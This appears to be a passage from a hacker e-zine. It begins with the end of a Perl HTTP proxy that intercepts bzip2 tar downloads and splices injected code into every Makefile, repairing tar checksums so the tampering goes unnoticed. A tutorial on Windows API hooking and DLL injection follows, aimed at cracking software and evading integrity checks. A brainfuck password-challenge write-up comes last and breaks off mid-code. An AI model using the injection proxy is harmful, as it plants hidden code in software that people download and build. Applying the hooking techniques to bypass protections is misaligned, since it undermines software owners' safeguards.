$compr_pid = open2($compr_in, $compr_out, "bzip2 -f -");
$compr_sel = IO::Select->new($compr_in);
$inject = 1;
print "Opened compressors\n";
}
# else, just pass it through
else {
$inject = 0;
}
# some internal variables for housekeeping while modifying the tar
# how far along in the archive are we
$tarofs = 0;
# offset of the next file header
$tarskipto = 0;
# used to collect a full tar block (512 bytes)
$tarbuf = "";
# wether we are currently injecting
$injecting = 0;
}

sub end_inject {
if ($inject) {
print "Closing compressors\n";
close($uncompr_out);
# allow for the uncompressor to uncompress the last buffer
usleep(200000);
handle_injection("");
close($uncompr_in);
close($compr_out);
usleep(200000);
handle_injection("");
close($compr_in);
print "Closed compressors\n";
}
}

sub inject_tar {
# a block tar
my $buf = shift;
my $retbuf = "";

# 3 buffers are used here
# $buf - input buffer, read 512 bytes at a time
# $tarbuf - used to keep leftovers until we have full 512 bytes
# $retbuf - what we return to client, 512 bytes. 1024 bytes when we just
# injected

# read the input buffer block by block
while (length($buf) > 0) {
# if we have less than a block, store it and wait for more
if (length($buf) + length($tarbuf) <= 512) {
$tarbuf .= $buf;
$tarofs += length($buf);
$buf = "";
last;
# else, take a block for injection
} else {
my $subset = 512 - length($tarbuf);
$tarofs += $subset;
$tarbuf .= substr($buf, 0, $subset);
$buf = substr($buf, $subset, 999999);
}

# contents of a the file are passed through
if ($tarofs != $tarskipto + 512) {
$retbuf .= $tarbuf;
$tarbuf = "";
# for file header blocks, we consider injection
} else {
my $filename = substr($tarbuf, 0, 100);
my $filesize = oct(substr($tarbuf, 124, 12));
# we inject to Makefiles
if ($filename =~ /Makefile\x00/) {
# part of header before checksum
my $precs;
# after checksum
my $postcs;
# checkusm
my $cs = 0;
printf ("Injecting 512 bytes to file: %s %d\n", $filename,
$filesize);
# increase file size by 1 block
$precs = substr($tarbuf, 0, 124) . sprintf("%011o ",
$filesize + 512) . substr($tarbuf, 136, 12);
$postcs = substr($tarbuf, 156, 512 - 156);
# calculate header checksum
foreach (split(//, $precs)) { $cs += ord; }
foreach (split(//, $postcs)) { $cs += ord; }
$cs += 8*32;
# inect $evilcode + padding of spaces to 512 bytes
$tarbuf = $precs . sprintf("%06o%c ", $cs, 0) . $postcs
. $evilcode . " "x(512-length($evilcode));
printf ("New block size: %d\n", length($tarbuf));
}
# update the start of next header
$tarskipto += 512;
if (($filesize / 512) == int($filesize / 512)) {
$tarskipto += $filesize;
} else {
$tarskipto += (int($filesize / 512) + 1) * 512;
}
$retbuf .= $tarbuf;
$tarbuf = "";
}
}

return $retbuf;
}

sub handle_injection {
$buf = shift;
#printf ("Got %d bytes from server\n", length($buf));
# for unknown files, simple passthrough
if (not $inject) {
$c->write($buf);
#printf ("Wrote %d bytes to client\n", length($buf));
} else {
# if we have new data, uncompress it
if (length($buf) > 0) {
print $uncompr_out $buf;
}
#printf ("Gave %d bytes to uncompressor\n", length($buf));
# first try to read the compressed input, to clear the pipeline
while ($compr_sel->can_read(0.01)) {
#$packed = <$compr_in>;
$compr_in->read($packed, 1024);
$c->write($packed);
#printf ("Got from compressor and wrote %d bytes to client\n",
# length($packed));
last unless length($packed) > 0;
}
# next, try to read the uncompressor, inject and feed the compressor
while ($uncompr_sel->can_read(0.01)) {
#$unpacked = <$uncompr_in>;
$uncompr_in->read($unpacked, 1024);
my $injected = inject_tar $unpacked;
print $compr_out $injected;
#printf ("Got from uncompressor and wrote %d bytes to compressor\n",
# length($unpacked));
last unless length($unpacked) > 0;
}
}
}
}

# listener
my $d = HTTP::Daemon->new(LocalAddr => "0.0.0.0",
LocalPort => 8000, Reuse => 1) || die;

# serve requests
while (my $c = $d->accept) {
# extract request requisites
my $r = $c->get_request;
break unless defined $r;
print "New request\n";

# get request bits
my $host = $r->header("Host");
my $headers = $r->headers;
my $uri = $r->uri;
my $method = $r->method;
my $content = $r->content;
if (not defined $host) {
# sucks.
$host = "localhost";
}
print "$method $host $uri\n";

# request original content
my $s = Net::HTTP->new(Host => $host) || die $@;
#$s->write_request($method, $uri, $headers, $content);
$s->write_request($method, $uri, 0, $content);
my($code, $mess, %h) = $s->read_response_headers;
$c->send_status_line( $code, $mess );
$c->send_crlf;

# write back
init_inject($c, $uri);
while (1) {
my $buf;
my $n = $s->read_entity_body($buf, 8192);
die "read failed: $!" unless defined $n;
last unless $n;
handle_injection($buf);
#$c->write($buf);
}
end_inject;
$c->close;

undef($c);
}

--------------------------------------------------------------------[ EOF ]-----


[==============================================================================]
[---------------------------[ Userland API Hooking ]---------------------------]
S0ban> - -- - - - - = == ================================================]


_.d####b._
.############.
.################.
.##################.__ __ __ __ _ _ __ __
##############/´_`|#\ V V // _` | '_/ -_)
##############\__,|# \_/\_/ \__,_|_| \___|
###########>"<######
*#########( )####*
##########>.<#####
################
*############*
"T######T"


0. Overview ------------------------------------------------------------------]

API hooking is essentially the act of intercepting an API function call, and
modifying it's functionality somehow, either by redirecting it to a function
of our choice, or stopping the function from being called, or logging the
request... the possibilities are endless. This is useful for cracking
applications, especially when the application does gay stuff like hardcode
API offsets (funny story, that...) and check itself for integrity in memory.

Unfortunately, API hooking under Windows - without going down the rabbit hole
of Kernel Mode Programming - has long been a poorly documented subject. What
little documentation is available is often incomplete or erroneous, and based
more than theory than in practice, basically without adequate information for
someone to actually implement a working API hook.

Also, while it is already possible to monitor API calls with a debugger (or
use a pre-built library such as Microsoft Detours), implementing your own API
hooking system is good programming practice, and will help reinforce your
knowledge of the PE format - always a good thing, if you want to do some
reversing or hacking on Windows.

Without further ado, into the flames.


1. Preparation - Background Information, PE Format, Points of
Attack ---------------------------------------------------------------------]

When a program is loaded into memory, a virtual memory space is created for it
(for each process), which holds the actual program and each DLL it needs
loaded at load-time (e.g. DLL's the programs calls functions from, e.g.
kernel32.dll, user32.dll). The program itself (the core PE file) and the DLL's
are collectively referred to as modules. You can load a process in WinDbg and
observe this for yourself.

1.0 "I've Googled a bit, what's this DLL injection stuff?" --------------------]

DLL injection is a subject often used in the same forum post as API hooking,
and for good reason.
When we do API hooking, we're effectively asking the target process to execute
our code instead of a given function - for example, by hooking MessageBoxW,
we're asking the program to run our code instead of the MessageBoxW contained
in user32.dll, a part of the Windows OS. However, the target process must have
the replacement code to execute within it's own virtual memory space. DLL
injection is the cleanest way to get code into the target process's virtual
memory space. We avoid directly writing our code into the other process's
memory space, as we can't be sure what we're overwriting - what may seem to be
a long string of zeroes may infact be used by the program for decompression,
etc etc.

1.1 Import Address Table Hooking ----------------------------------------------]

When the core PE file is loaded into memory, it's structure is similar to the
PE structure on disk (see Iczelion's tutorials on PE format, they are quite
thorough). Unlike on disk, however, there is no need to convert virtual
addresses to physical ones, as everything is already in it's appropriate
(virtual) address. Each process is by default loaded at the base address of
0x00400000, starting with the IMAGE_DOS_HEADER structure.

Following on from this, the IMAGE_NT_HEADERS structure is located at
0x00400000 + IMAGE_DOS_HEADER.e_lfanew
(as per on disk). This structure contains the Import Address Table
(IMAGE_NT_HEADERS.OptionalHeader.DataDirectories[1]).
This table contains a list of the API functions the program imports. This
list is filled in at load time by the windows PE loader, which fills the list
in with the actual in-memory locations of these API functions. When the
program wants to call an API function, it simply looks up the location of
the function from this Import Address Table.

Assuming we have already injected a DLL into the target process containing
our code, we can redirect a function to our code by changing it's entry in
the Import Address Table.

The original API is still loaded at it's original place in memory, so to call
it, we simply save the address of the original API when hooking, look it up,
and call that function when we're done with our processing.

In summary, the process of hooking an API using IAT hooking is as follows:

- Open the target process
- Inject a DLL containing our custom function
- Locate the Import Address Table
- Locate the specific entry for the function we need
-- Save this entry, incase we want to call the original later
- Replace that entry with one pointing to a custom function


1.2 Inline Hooking ------------------------------------------------------------]

When the core PE file is loaded into memory, the PE loader conveniently also
loads any other DLLs the program needs (for example, if the program calls
MessageBoxA, user32.dll will be loaded). These DLL's are also mapped into the
process's memory space, as in the following diagram:

-----------------------------
----------------
Notepad.exe
[... Import Address Table ...]
Main:
printf("hi");
exit(0);
...
----------------
----------------
kernel32.dll
[... Export Address Table ...]
ExitProcess:
add eax,1
...
----------------
----------------
user32.dll
[... Export Address Table ...]
MessageBoxA:
push ecx
...
----------------
----------------
more.dlls
[... Export Address Table ...]
AnotherFunction:
xor ecx,edx
...
----------------
-----------------------------

In the header structures of these DLLs are Export Address Tables, which is a
list of each function the DLL exports, along with it's corresponding location
in the DLL. Knowing where the DLL is located in the host process's memory
space (using WinAPI, we can enumerate the modules in a process), and knowing
where a function is in a DLL, we can locate where the function is in the
process's memory space.

Inline hooking involves locating a target function in this manner, then
modifying the code of the target function in order to make the target function
jump to a location the user specifies once it starts executing.

----------------------------------------------------------
MessageBoxA: MessageBoxA: [After]
mov edi, edi push offset hookMessageBoxA
push ebp ret
mov ebp, esp ...
... ...
----------------------------------------------------------

The greatest advantage of this type of modification over IAT patching is that
it's fairly flexible, and evades a lot of common anti-debugging tricks such as
checking for IAT hooks. Additionally, we are able to hook API's which aren't
imported by the target program (e.g. API's loaded via GetProcAddress API call).
Also, there's greater flexibility in potential hook locations thanks to Win32's
API design:

-------------------------------------------------
ApiFunction() -> ApiFunctionEx() / ApiFunctionW()
-------------------------------------------------

Many Win32 API's are simply wrappers for other API's. For example, MessageBoxA
"subcontracts" it's work to MessageBoxExA, which in turn calls
MessageBoxTimeoutA, which then calls MessageBoxTimeoutW. With inline hooking,
we are able to hook at any point of this call chain, including
MessageBoxTimeoutW, which will also catch MessageBoxW calls.

In summary, the process of inline hooking is as follows:

- Open the target process
- Locate the DLL containing the function we want to hook within the
target process's memory space
- Locate the target function within the target DLL, map that to the
memory space
- Inject a DLL containing our custom function, locate our custom
function within the newly injected DLL, map to memory space of target
process
- Store first six bytes/prelude (implementation-dependent,
explained below)of the "old" function
- Patch the "old" function to point to our custom function


2. Implementation Specifics ---------------------------------------------------]

The most important part of any technique is implementation, without
implementation we are nothing. This section is not a step-by-step guide to
implementing an API hooking system, it simply outlines some of the more
common pitfalls with import address table and inline hooking, and how to
avoid them.


2.0. How to get the location of our "replacement" function --------------------]

The easiest method is to parse the export address table of our DLL either
in-memory or on-disk, and retrieve it from there. Alternatively, use
GetProcAddress and LoadLibrary on our custom DLL from within our custom DLL's
DllEntry function.

2.1 I need to hook functions from when a program starts executing,
I don't want to miss any API calls ----------------------------------------]

The obvious solution would be to use CreateProcess with the CREATE_SUSPENDED
flag to create the thread and parse it - however, you can't inject a DLL into
a process with a suspended primary thread, because the primary thread is
suspended, and can't load your DLL (or any DLLs). Thus, we implement a small
hack - we parse the PEB of the target program (use NtQueryProcessInformation
to find the PEB) to find the image's base address and thus it's entrypoint,
and save it. We then modify the first two bytes at the entrypoint to simply
loop back to itself ("\xEB\xFE", or "jmp $-2"). We use Get/SetThreadContext
to set our thread's instruction pointer (just modify the EIP register in the
CONTEXT structure) to the entrypoint which we located earlier, then
ResumeThread. This puts the thread into an infinite loop, without truly
suspending it - the thread does nothing useful, but continues to execute and
load modules. After loading our DLL's, we SuspendThread again, restore the
first two bytes at the entry point, and use Get/SetThreadContext to reset the
primary thread's instruction pointer, and use ResumeThread to wake our process,
effectively "unfreezing" it. In summary:

- Need to hook right from the beginning of a process?
-- No: ExitProcess(0);
-- Yes:
---- Use CreateProcess[Ex] to create the target process with CREATE_SUSPENDED
---- Use NtQueryProcessInformation to find the PROCESS_BASIC_INFORMATION struct
---- Read the PEB from our target process's memory space (located at
PROCESS_BASIC_INFORMATION.PebBaseAddress).
---- Find the ImageBaseAddress from the PEB - that's where the core process
is located in memory. Parse the PE headers to find the process's entry
point.
---- Save the first two bytes at the entry point, replace them with \xEB\xFE
---- Use GetThreadContext on the primary thread (still suspsended) to get a
CONTEXT structure. Modify EIP to point to the entry point.
---- Use SetThreadContext to install the modified CONTEXT structure
---- Resume the thread with ResumeThread. The primary thread will now run
in an infinite loop at the entrypoint, but it won't be suspended.
---- Sleep() for a short period to let the DLL's that were originally
going to load with the DLL load. When creating a process with
CREATE_SUSPENDED, not all DLL's are fully loaded when you can first
take control of the process.
---- [ Load DLL's, hook API's, make general eliteness here ]
---- Suspend the thread again with SuspendThread
---- Restore the two bytes at the entry point
---- Use GetThreadContext on the primary thread to get CONTEXT, set EIP to the
entry point
---- Use SetThreadContext to install the modified CONTEXT
---- Push button
---- ???
---- Receive 2 bacon, 6 internets and 1 win.


2.2 DLL loading isn't instant, how do I tell when my DLL is loaded? -----------]

Generally, simply use some communications channel between your DLL and your
"injector" applet/loader, such as IPC pipes. Alternatively, use
WaitForDebugEvent with a timeout, and wait for a LOAD_DLL_DEBUG_EVENT, or just
implement a timeout (using a fixed length of time). If you load your process in
a frozen state and hook the API's you need from there.


2.3 How do I call the original function when I use inline hooking? ------------]

There are different ways to restore the the original functionality of the
hooked function when using inline hooking. The best method will depend on how
you patched the original call. One suggestion (my method) is to patch the
original call with a PUSH (offset of your replacement function), followed by
RET. This solves the problem of relative offset calculation (use an absolute
offset in the push), and preserves the stack (unlike CALL). Here's how to
restore the original functionality:

2.3.0 Patch the call (one-off hooks, functions you only need hooked once)
- Retrieve the location of the original hooked API (communicate with the
process that did the hooking, or LoadLibrary and GetProcAddress)
- Retrieve the bytes overwritten during patching (or hardcode them)
- Restore the first few bytes of that hooked function, write directly to
memory.

2.3.1 Emulate the first few instructions of the orignal function
- Retrieve the location of the original hooked API (communicate with the
process that did the hooking, or LoadLibrary and GetProcAddress)
- Recreate the stack as you got it, with the exception of the return addr:

---------------------------------------------------------------------]

For example, the hook function:

hook_recv PROC s:DWORD, buf:DWORD, bLen:DWORD, flags:DWORD

;; stack is at state 1 (on the left, diagram below)

push flags
push bLen
push buf
push s

;; the stack as you got it is effectively duplicated

lea eax,retAddr
push eax

;; create a new return address

mov eax,recvOffset

;; WSARecv
mov edi,edi
push ebp
mov ebp,esp
push ecx
add eax,6

;; stack is at state 2 (on the right, below)
;; eax is WSARecv + 6, the number of bytes you emulated.
push eax
db 0C3h

retAddr: ret
hook_recv ENDP

---------------------------------------------------------------------]

Stack frames:

Original stack frame Recreated Stack Frame

[RETNADDR] [retAddr] ---\
[s] [s] |
[buf] [buf] >-- destroyed by real
recv func
[bLen] [bLen] |
[flags] [flags] ---/
[RETNADDR]
[s]
[buf]
[bLen]
[flags]



3. Summary --------------------------------------------------------------------]

In summary, API hooking is a powerful and flexible, but under-utilised
technique. In this document, two methods are outlined for implementing
user-land API hooking, and will hopefully help you write your own custom
API hooking system.

Happy hacking. Remember - cheat for life, cheat to win. [ EOF ]


[==============================================================================]
[--------------------------[ The Brainfuck Challenge ]-------------------------]
[==============================================================================]


_.d####b._
.############.
.################.
.##################.__ __ __ __ _ _ __ __
##############/´_`|#\ V V // _` | '_/ -_)
##############\__,|# \_/\_/ \__,_|_| \___|
###########>"<######
*#########( )####*
##########>.<##### author: zshzn
################ email: vzshzn|gmail|com
*############*
"T######T"



--[ 00 ]----------------------------------------------[ Table Of Contents ]-----


1 The Challenge
1.1 Brainfuck
1.2 Translating
1.3 Understanding
2 Wordlist Attack
2.1 filter.c
2.2 Results
3 Cryptanalysis
3.1 Kasiski Method
3.2 Z Method
3.3 Analysis
3.4 Alternative
4 Known Plaintext Attack
4.1 Motivation
4.2 kpt.pl
4.3 Results
5 Conclusions



--[ 01 ]--------------------------------------------------[ The Challenge ]-----


In the last zine rattle published a small challenge, a simple brainfuck
programs with no instructions. This little piece explains how I went
about attacking the challenge.

1.1 Brainfuck

__gd++++++++++[>+++>++bp__
_g++++>+P^^""j+++"^""^^++++<<<p_
_g-]>>^>.+b d++ +; ""^^+++.p_
_d[-]^" :<- -.[ "^-]<b_
_d++.' [-b_ ]>b `---b_
d---' _gg----bpd[++p_d+bpp_ `+++b
d+++ _d+>,----------]<[[>]<bp_ [>>b
d+<< d[<]<++>>[>]<-]<[[>>+<<[<]b_ <->b
d>[> d]<-]<[<]]>]<++++++P^^T+++++ +++b
d++[ '<-------->-]<[[-]++++bggpd++++b_ ++[b
:>++ _+++++++<-]>---.-----.---.-.-----p___g_ --.;
<<]; d>>>>[[[<<<<+>>>>-]>]<<<+^"^++++++^^+++[; :>--
:--- :>--->---->----:->-------_ "^--bpd>---_ ---;
---; :-->---------->b------>^^--p_ `--->---; :---
:>-- :--->---->------ `^^^' "^>-p_ l-`-> ---;
:--- >---->--------- `-->p__;-b ---;
>--; -->---->------; `-----:>b :---
---;

  
>---------->--- -b _ :---
:--- d->--->---->----_ -b___-b >--;
:--- _g->---->------>-----p____________gp__ :-`^^^' >--;
-->; `^^'----------->--->----->---->-------p_ -b___ :->-
:--- ->----->----->---->---------->-----b_ "^" ---;
-->; `----------->------>----------->----b :---
:--- >----->------>---->----->---------->; ---;
---b _ :>-`--->----->----->----->------>----; d---
---b >----; :>---->----[<]>-]>--->-->+>+++>++> d>++
>++b `^^' +>+ "^++>++++>->----->>----->+++>- d---
>>-b -- ->--->----->++>->++++>>+>-;d->+
+>+b_ ' +>->>+>++>->--->-->--->---->+
`+++>p_ d>->----->++++>+>+>+++>+++>-'
`-->--p______g--->++>+++>++++>++>+++>----'
"
^>+++>++++>>++++>>----->->----[<]>[^"
"
^<<+<[<]>[[>]<+>>-<<[<]>-]>[>^"
""]<->>.[-]>]]++++++++++."



1.2 Translating

To understand the code, first I translated it into a language that I could
debug more easily. I could use gdb (and a C brainfuck interpreter) or a
custom-built brainfuck debugger, but instead I took this avenue. I used some
bf-to-perl translator, and then I split it into understandable chunks, added
some commenting, and made a tiny eightbit implementation. Unfortunately I did
not optimize the actual output, so it's very dirty and repetitive.

#!/usr/bin/perl

use strict;
use warnings;

use Data::Dumper;

use constant OVERLOAD => 1;

package Eightbit;

sub new
{
my ($class, $start) = @_;
bless { VAL => ($start || 0) % 256 }, $class;
}

# The reason I do the is because rattle (and bf programmers in general) abuse
# integer overflow. So what are negative numbers in Perl (or excessively large
# numbers) actually wrapped in eightbit (standard) bf implementations

# This is horribly dirty.
# Very incomplete implementation of an eight-bit data type.
use overload
'++' => sub { ++$_[0]->{VAL}; $_[0]->{VAL} %= 256 },
'--' => sub { --$_[0]->{VAL}; $_[0]->{VAL} %= 256 },
'bool' => sub { $_[0]->{VAL} };

package main;

# Ugh.
my @m;
my $p = 0;

# You may wonder just why I create an array of Eightbit objects, instead of one
# object that acts as a container for eight-bit items.
# Elementary, Watson. I already had the Perl generated, and did not want to
# change all my $m[$p] to $m->{$p} or $m->item($p) or any other interface!
OVERLOAD and $m[$_] = new Eightbit for 0 .. 80;

# My debugging subs, of course
# I don't think they are in use in the program as I've copied it, but they were
# crucial to understanding it.
sub display
{
print "\nindex: $p\n";
print "\@m[$_] = $m[$_]\n" for 0 .. $#m;
# print "\@m[$_] = $m[$_]:@{[chr $m[$_]]}\n" for 0 .. $#m;
}

sub marker { print "\n[here]\n"; }

sub i { print "\nindex: $p\n"; }

# Commence program

# Printing "PW: "
$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;
$m[$p]++;$m[$p]++;

while($m[$p]){

;$p++;$m[$p]++;$m[$p]++;$m[$p]++;$p++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;
$m[$p]++;$m[$p]++;$p++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;
$m[$p]++;$m[$p]++;$p--;$p--;$p--;$m[$p]--;
};
$p++;$p++;$p++;
print chr $m[$p];
$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;
print chr $m[$p];

while($m[$p]){$m[$p]--;}

$p--;$m[$p]--;$m[$p]--;
print chr $m[$p];

while($m[$p]){$m[$p]--;};

$p--;$m[$p]++;$m[$p]++;
print chr $m[$p];

# INPUT
while($m[$p]){$m[$p]--;}

$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;

while($m[$p]){

$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;
$m[$p]++;$m[$p]++;$p++;
$m[$p]= new Eightbit(ord getc);

$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;
};


$p--;

# Input of ABCDEF gets us:
# \0\0\0ABCDEF
# password starts at $m[3]

# Note that rattle tends to index from 1
# Basically leaving $m[0] = 0 lets him find the bottom easily
# He will do: [-]. To us: while ($m[$p]) { $p-- } to reduce the index value
# until hitting a blank value

# It takes a bit of effort to travel from one end of the array to the other
# So rattle has variables, then a blank entry, then the password, then a blank
# entry, then more variables. That's probably the best way to do it.
# So note that he uses counters that are positioned before and after strings

while($m[$p]) {
while($m[$p]){;
$p++; # Go to the back of the string (excluding counters at end)
};
$p--; # Down one, last item in password
while($m[$p]){;
$p++;$p++;$m[$p]++;$p--;$p--; # Increase point two chars right by 1 (some
# extra counter val)
while ($m[$p]) { $p--; } # Get down to before password
$p--;
$m[$p]++;$m[$p]++; # Counter $m[1] += 2
$p++;$p++; # Counter to start of pw
while($m[$p]){;
$p++;
};
$p--; # Last char
$m[$p]--; # last char -1

};
# We have eliminated the last letter, on to the one before it
$p--;
while($m[$p]){;
while($m[$p]){;
$p++;$p++;$m[$p]++;$p--;$p--;
while($m[$p]){;
$p--;
};
$p--;
$m[$p]--; # $m[1]--
$p++;$p++;
while($m[$p]){; # Same deal, just increase counter by one
# instead of two
$p++;
};
$p--;
$m[$p]--;
};
$p--;
while($m[$p]){;
$p--;
};
};

$p++;
};

# We have added double the last letter in the password to Counter 1, then
# subtracted the second last from Counter 1
# We continue left:
# ABCDEF -> FEDCBA -> 70*2 - 69 + 68*2 - 67 + 66*2 - 65
# Rather oddly he has shifted the entire string two characters to the right

$p--;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;
$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;
# $m[2] = 16;
while($m[$p]){;

$p--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
$p++;$m[$p]--;
};
# $m[1] -= 128


$p--;

OVERLOAD or $m[1] %= 256;
# Brainfuck values exist in eight-bit chars.
# You can do the above to make the hash work if you don't want to use
# overloading


# $m[1] = 0; # Uncomment this to bypass the next part if you're too lazy to use
# a real password
# I test with the passwords " " and "0chunk"
# The first is perfectly balanced, the second abuses overflow.

# This loop just destroys our hard work to produce WRONG
while($m[$p]){;
while($m[$p]){;
$m[$p]--;
};

$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;
$m[$p]++;$m[$p]++;
# $m[1] = 10;

while($m[$p]){;

$p++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;
$m[$p]++;$p--;$m[$p]--;
}
;$p++;$m[$p]--;$m[$p]--;$m[$p]--;

# BEGIN printing WRONG
print chr $m[$p];
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
print chr $m[$p];
$m[$p]--;$m[$p]--;$m[$p]--;
print chr $m[$p];
$m[$p]--;
print chr $m[$p];
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
print chr $m[$p];
# END printing WRONG
$p--;$p--;

}
# To avoid losing, $m[1] must equal 0

# See how that worked? He "hashes" the password you give him
# If the sum of two times the even letters (by reverse index) sub the odd
# letters equals 128, you move on

# This still allows for a nearly unlimited (other than by interpreter) amount
# of possible working passwords, restricted to eightbit hash space.
# Basically 1/256 of possibilities will pass since we're in eight-bit space.
# I prefer " ", it's fun!

# Now our PW is stored in indexes $m[5] and up

$p++;$p++;$p++;$p++;
# Get to the first char

# This condition fails if our hash failed, and the program falls through to
# termination
while($m[$p]){;
while($m[$p]){;
while($m[$p]){;
$p--;$p--;$p--;$p--;$m[$p]++;$p++;$p++;$p++;$p++;$m[$p]--;
}
$p++;
}
# we move it to $m[1] and up


;$p--;$p--;$p--;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;
$m[$p]++;$m[$p]++;$m[$p]++;
# to right of last char is 10

while($m[$p]){

$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;
$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;

$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;
$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;;;$m[$p]--;$m[$p]--;$m[$p]--;$p++;
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;;;$m[$p]--;
$m[$p]--;$m[$p]--;$m[$p]--;;;$p++;$m[$p]--;$m[$p]--;;;$m[$p]--;$m[$p]--;$p++;
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;;;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;;;$p++;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
$p++;$m[$p]--;$m[$p]--;;;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;
$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;
$m[$p]--;$m[$p]--;;;$m[$p]--;$m[$p]--;$p++;;;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;
$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;;;$m[$p]--;$m[$p]--;$p++;;;$m[$p]--;
$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;
